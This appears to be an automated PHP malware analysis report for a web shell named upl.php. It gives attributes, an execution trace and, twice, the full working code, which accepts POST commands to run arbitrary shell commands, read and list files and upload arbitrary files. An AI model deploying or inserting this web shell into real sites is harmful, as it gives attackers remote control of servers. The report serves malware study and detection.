PHP Malware Analysis
upl.php
md5: e27f6ea1fb6afff3e15b102195b6ff8e
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
- base64_decode (Deobfuscated, Original)
Execution
- shell_exec (Deobfuscated, Original)
Files
- file_get_contents (Deobfuscated, Original)
- file_put_contents (Deobfuscated, Original)
Input
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
<?php
function echo_json($data = [])
{
echo json_encode($data);
}
if (!empty($_POST['cmd'])) {
if ($_POST['cmd'] == "test") {
echo_json(["code" => 200]);
}
if ($_POST['cmd'] == "get_file_data") {
$data = file_get_contents("/var/www/html/" . $_POST['file']);
echo_json(["code" => 200, "data" => $data]);
}
if ($_POST['cmd'] == "get_files") {
$struct = [];
$files = scandir("/var/www/html");
foreach ($files as $file) {
if ($file == '.' || $file == '..') {
continue;
}
if (is_dir("/var/www/html/" . $file)) {
$sub_files = scandir("/var/www/html/" . $file);
$struct[] = ["file" => $file, "type" => "d", "sub_files" => $sub_files];
} else {
$struct[] = ["file" => $file, "type" => "f"];
}
}
echo_json(["code" => 200, "struct" => $struct]);
}
if ($_POST['cmd'] == "get_dir") {
echo_json(["code" => 200, "dir" => "/var/www/html"]);
}
if ($_POST['cmd'] == "shell_exec") {
shell_exec($_POST['command']);
echo_json(["code" => 200]);
}
if ($_POST['cmd'] == "mkdir") {
mkdir($_POST['dir']);
chmod($_POST['dir'], 0755);
echo_json(["code" => 200]);
}
if ($_POST['cmd'] == "upload") {
file_put_contents($_POST['file'], base64_decode($_POST['data']));
chmod($_POST['file'], 0644);
echo_json(["code" => 200]);
}
}Execution traces
data/traces/e27f6ea1fb6afff3e15b102195b6ff8e_trace-1676255973.2398.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:39:59.137657]
1 0 1 0.000182 393512
1 3 0 0.000332 409064 {main} 1 /var/www/html/uploads/upl.php 0 0
1 3 1 0.000355 409064
0.000386 314864
TRACE END [2023-02-13 00:39:59.137898]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?php
function echo_json($data=[])
{
echo json_encode( $data );
}
if( !empty( $_POST['cmd'] ) ){
if( $_POST['cmd'] == "test" ){
echo_json([
"code" => 200,
]);
}
if( $_POST['cmd'] == "get_file_data" ){
$data = file_get_contents( __DIR__ . '/' . $_POST['file'] );
echo_json([
"code" => 200,
"data" => $data,
]);
}
if( $_POST['cmd'] == "get_files" ){
$struct = [];
$files = scandir( __DIR__ );
foreach ($files as $file) {
if( $file == '.' || $file == '..' ){
continue;
}
if( is_dir( __DIR__ . '/' . $file ) ){
$sub_files = scandir( __DIR__ . '/' . $file );
$struct[] = [
"file" => $file,
"type" => "d",
"sub_files" => $sub_files,
];
}else{
$struct[] = [
"file" => $file,
"type" => "f",
];
}
}
echo_json([
"code" => 200,
"struct" => $struct,
]);
}
if( $_POST['cmd'] == "get_dir" ){
echo_json([
"code" => 200,
"dir" => __DIR__,
]);
}
if( $_POST['cmd'] == "shell_exec" ){
shell_exec( $_POST['command'] );
echo_json([
"code" => 200,
]);
}
if( $_POST['cmd'] == "mkdir" ){
mkdir( $_POST['dir'] );
chmod( $_POST['dir'] , 0755 );
echo_json([
"code" => 200,
]);
}
if( $_POST['cmd'] == "upload" ){
file_put_contents( $_POST['file'] , base64_decode( $_POST['data'] ) );
chmod( $_POST['file'] , 0644 );
echo_json([
"code" => 200,
]);
}
}